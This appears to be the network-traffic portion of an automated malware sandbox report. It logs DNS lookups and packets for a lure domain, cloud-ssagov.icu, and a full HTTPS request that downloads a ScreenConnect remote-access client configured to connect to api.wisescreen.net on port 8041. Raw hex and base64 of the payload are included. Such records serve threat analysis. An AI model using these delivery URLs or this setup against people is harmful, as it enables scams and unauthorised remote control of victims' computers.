Nov 13, 2024 18:18:23.742193937 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.742194891 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.742259026 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.742418051 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.742719889 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.742774010 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.742912054 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.742912054 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.742928028 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.742994070 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.743624926 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.743669987 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.743706942 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.743724108 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.743752956 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.743789911 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.744519949 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.744565964 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.744607925 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.744626045 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.744648933 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.744678020 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.745456934 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.745506048 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.745543957 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.745554924 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.745579958 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.745619059 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.842335939 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.842398882 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.842513084 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.842695951 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.842695951 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.842762947 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.842951059 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.859047890 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.859113932 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.859298944 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.859292984 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.859293938 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.859352112 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.859390020 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.859404087 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.859488010 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.859523058 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.860048056 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.860095024 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.860125065 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.860142946 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.860172987 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.865029097 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.865077019 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.865119934 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.865133047 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.865158081 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.865505934 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.865547895 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.865596056 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.865609884 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.865641117 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.865981102 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.866028070 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.866059065 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.866070986 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.866117001 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.919106007 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.954580069 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.954649925 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.954754114 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.954819918 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.954880953 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.954998016 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.955049038 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.955054045 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.955071926 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.955085993 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.955131054 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.955152988 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.955230951 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.955275059 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.955311060 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.955326080 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.955384970 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.955384970 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.956010103 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.956059933 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.956103086 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.956115961 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.956144094 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.956163883 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.958542109 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.958590031 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.958641052 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.958655119 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.958682060 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.958704948 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.958753109 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.958795071 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.958834887 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.958847046 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.958872080 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.958910942 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.959254026 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.959304094 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.959352970 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.959364891 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.959388971 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.959418058 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.959669113 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.959721088 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.959753990 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.959764957 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.959791899 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.959810972 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.995496988 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.995556116 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.995697021 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.995749950 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.995789051 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.995790005 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.995790005 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.995862961 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.995913029 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.996347904 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.996390104 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.996431112 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.996449947 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.996479988 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.996551991 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.996601105 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.996625900 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.996639013 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.996680975 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.998037100 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.998075962 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.998136044 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.998148918 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.998174906 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.998213053 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.998260021 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.998279095 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.998291016 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.998342037 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.998342991 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.998409986 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.998424053 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.998816967 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:23.998903990 CET	443	49764	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:23.998974085 CET	49764	443	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:28.048228025 CET	49766	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:28.054056883 CET	8041	49766	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:28.054136038 CET	49766	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:28.584891081 CET	49766	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:28.590507030 CET	8041	49766	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:28.888472080 CET	8041	49766	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:28.903675079 CET	49766	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:28.908673048 CET	8041	49766	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:29.162642956 CET	8041	49766	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:29.162667036 CET	8041	49766	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:29.162739992 CET	49766	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:29.865813017 CET	49766	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:29.865933895 CET	49766	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:18:29.871001005 CET	8041	49766	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:29.871079922 CET	8041	49766	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:29.871181011 CET	8041	49766	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:29.871296883 CET	8041	49766	185.49.126.73	192.168.2.4
Nov 13, 2024 18:18:29.871326923 CET	8041	49766	185.49.126.73	192.168.2.4
Nov 13, 2024 18:19:29.872234106 CET	49766	8041	192.168.2.4	185.49.126.73
Nov 13, 2024 18:19:29.877376080 CET	8041	49766	185.49.126.73	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 18:17:57.921045065 CET	55514	53	192.168.2.4	1.1.1.1
Nov 13, 2024 18:17:57.974356890 CET	53	55514	1.1.1.1	192.168.2.4
Nov 13, 2024 18:18:27.543122053 CET	57215	53	192.168.2.4	1.1.1.1
Nov 13, 2024 18:18:28.010617018 CET	53	57215	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 13, 2024 18:17:57.921045065 CET	192.168.2.4	1.1.1.1	0x8f2a	Standard query (0)	cloud-ssagov.icu	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:18:27.543122053 CET	192.168.2.4	1.1.1.1	0x4e0a	Standard query (0)	api.wisescreen.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 13, 2024 18:17:57.974356890 CET	1.1.1.1	192.168.2.4	0x8f2a	No error (0)	cloud-ssagov.icu		185.49.126.73	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:18:01.505163908 CET	1.1.1.1	192.168.2.4	0xd214	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:18:01.505163908 CET	1.1.1.1	192.168.2.4	0xd214	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:18:02.409730911 CET	1.1.1.1	192.168.2.4	0x6cc7	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 18:18:02.409730911 CET	1.1.1.1	192.168.2.4	0x6cc7	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:18:03.613070011 CET	1.1.1.1	192.168.2.4	0xbe11	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 18:18:03.613070011 CET	1.1.1.1	192.168.2.4	0xbe11	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 13, 2024 18:18:28.010617018 CET	1.1.1.1	192.168.2.4	0x4e0a	No error (0)	api.wisescreen.net		185.49.126.73	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cloud-ssagov.icu

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:17:59 UTC	613	OUT	GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip Connection: Keep-Alive
2024-11-13 17:18:00 UTC	269	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 117161 Content-Type: application/x-ms-application; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:17:59 GMT Connection: close
2024-11-13 17:18:00 UTC	16115	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
2024-11-13 17:18:00 UTC	16384	IN	Data Raw: 62 67 67 38 54 52 50 49 50 55 6c 52 38 45 41 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c Data Ascii: bgg8TRPIPUlR8EAGliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJL
2024-11-13 17:18:00 UTC	16384	IN	Data Raw: 41 62 77 42 73 41 46 41 41 59 51 42 75 41 47 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48 Data Ascii: AbwBsAFAAYQBuAGUAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAH
2024-11-13 17:18:00 UTC	16384	IN	Data Raw: 41 61 51 42 73 41 47 6b 41 64 41 42 35 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46 Data Ascii: AaQBsAGkAdAB5AFAAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAF
2024-11-13 17:18:00 UTC	16384	IN	Data Raw: 73 5a 57 4e 30 49 46 52 76 62 32 77 42 50 45 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48 Data Ascii: sZWN0IFRvb2wBPENob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIH
2024-11-13 17:18:00 UTC	16384	IN	Data Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 56 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 41 70 68 2f 57 53 63 31 37 4c 6b 30 6f 49 7a 37 50 51 72 4d 4b 30 45 55 55 66 30 37 75 6d 2f 64 6b 6f 67 41 44 67 68 57 70 47 36 30 50 67 6b 2b 77 78 55 43 6e 35 42 41 4e 49 47 50 6e 4e 39 53 38 4d 6f 54 63 79 53 76 51 63 53 52 31 4b 31 32 45 75 53 7a 68 6a 6d 46 2f 36 61 33 4e 67 2b 6d 75 31 59 50 70 72 53 35 4f 4b 62 52 4e 4e 4e 6e 43 4f 41 77 41 41 47 67 4d 41 41 4a 30 42 41 41 42 69 41 51 41 41 55 41 49 41 41 4d 38 41 41 41 44 78 Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAAVAAAAAAAAAFBBRFBBRFAph/WSc17Lk0oIz7PQrMK0EUUf07um/dkogADghWpG60Pgk+wxUCn5BANIGPnN9S8MoTcySvQcSR1K12EuSzhjmF/6a3Ng+mu1YPprS5OKbRNNNnCOAwAAGgMAAJ0BAABiAQAAUAIAAM8AAADx
